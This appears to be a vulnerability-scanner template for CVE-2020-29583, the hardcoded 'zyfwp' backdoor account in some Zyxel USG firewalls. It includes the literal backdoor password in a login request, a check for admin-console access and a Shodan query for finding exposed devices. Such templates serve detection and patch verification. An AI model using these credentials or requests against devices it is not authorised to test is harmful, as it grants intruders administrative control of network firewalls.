id: CVE-2020-29583

info:
  name: ZyXel USG - Hardcoded Credentials
  author: canberbamber
  severity: critical
  description: |
    A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
  reference:
    - https://www.zyxel.com/support/CVE-2020-29583.shtml
    - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29583
    - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29583
    cwe-id: CWE-522
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"USG FLEX 100"
  tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev

http:
  - raw:
      - |
        GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /ext-js/index.html HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'data-qtip="Web Console'
          - 'CLI'
          - 'Configuration"></a>'
        condition: and

      - type: status
        status:
          - 200